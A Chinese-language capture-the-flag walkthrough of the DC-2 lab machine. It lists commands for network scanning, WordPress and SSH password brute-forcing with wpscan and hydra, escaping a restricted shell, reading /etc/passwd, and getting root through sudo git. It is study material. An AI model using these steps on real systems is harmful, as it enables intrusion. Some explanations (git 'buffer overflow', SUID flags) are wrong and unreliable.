渗透测试实战-靶机入侵
虚拟机配置要求攻击机kali 和靶机在同一网段下,我这里都是用的NAT模式,访问靶机IP时,发现是通过域名进行访问的,但是,会出现无法访问。这个时候需要配置/etc/hosts,将IP地址和域名进行绑定 如:192.168.111.135 dc-2
1、信息收集
ip
namp -sP 192.168.111.0/24
端口
nmap -A -p- 192.168.111.135
80端口为:http服务, 版本为:Apache httpd 2.4.10 ((Debian)) ,CMS :WordPress
7744端口为:ssh服务,版本号为:OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
访问web站点,发现将IP地址跳转到域名
修改/etc/hosts文件,将IP地址和域名进行绑定
再次访问
2、flag1
查看flag1
依据提示,使用cewl生成字典,进行暴力破解,获取账户名和密码
使用目录扫描工具,找到登录页面
dirb http://192.168.111.135
cewl是kali上自带的一款字典生成工具
cewl http://dc-2/ -w > dict.txt
根据信息收集,是一个wordpress的站版本为版本4.7.10,利用wordpress的工具wpscan来进行扫描
WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。wpscan -h 查看用法。
wpscan --url http://dc-2 --enumerate u 枚举用户
枚举用户
生成用户名字典
破解密码
wpscan --url http://dc-2 -U user.txt -P dict.txt
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
登录jerry
3、flag2
登录tom 也没发现任何的问题。依据之前做的信息收集,发现ssh服务是开放的,端口为7744 尝试利用
使用hydra爆破出了的tom的ssh服务密码,该工具在kali中是自带的
hydra -L user.txt -P dict.txt ssh://192.168.111.136 -s 7744 -t 64
得到密码,登录SSH
ssh tom@192.168.111.135 -p 7744
4、flag3
但是无法使用cat 命令进行查看 ,shell 权限被限制了
查看可以使用的命令,echo $PATH
less flag3.txt
5、flag4
解决rbash绕过问题
rbash是受限的shell的一种,设置受限的shell,防止攻击者的入侵,提高一些会对系统造成危害的命令
方法一:vi提权:通过vi 编辑器,进行饶过
vi flag3.txt :set shell=/bin/sh 回车
运行shell: shell 回车
vi编辑flag3.txt ,可以使用cd 等命令
方法二:通过export命令修改环境变量得到shell
BASH_CMDS[a]=/bin/sh;a 注:把/bin/bash给a变量`
export PATH=$PATH:/bin/ 注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin 注:将/usr/bin作为PATH环境变量导出
echo /* 输出根目录
先查看用户信息
cat /etc/passwd
切换Jerry用户下
su jerry 切换身份
cd /home/jerry 进入Jerry目录
6、flag5
查看一下可以使用的root权限命令
find / -perm -u=s -type f 2>/dev/null
‐perm 按照文件权限来查找文件
‐u=s 基于用户可写查找 //s就是root用户的意思
‐type f 查找普通类型文件
sudo 可以使用,尝试提权
(root) NOPASSWD: /usr/bin/git表示root用户可以在不需要输入密码的情况下使用/usr/bin/git命令
根据提示最后的flag使用git,通过git来提权
git提权的原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码既可以执行这条命令
方法1:sudo git help config,然后在末行输入!/bin/bash或!'sh'完成提权。
方法2:sudo git -p help,然后输入!/bin/bash,即可打开一个root的shell
成功提权,访问flag5.txt
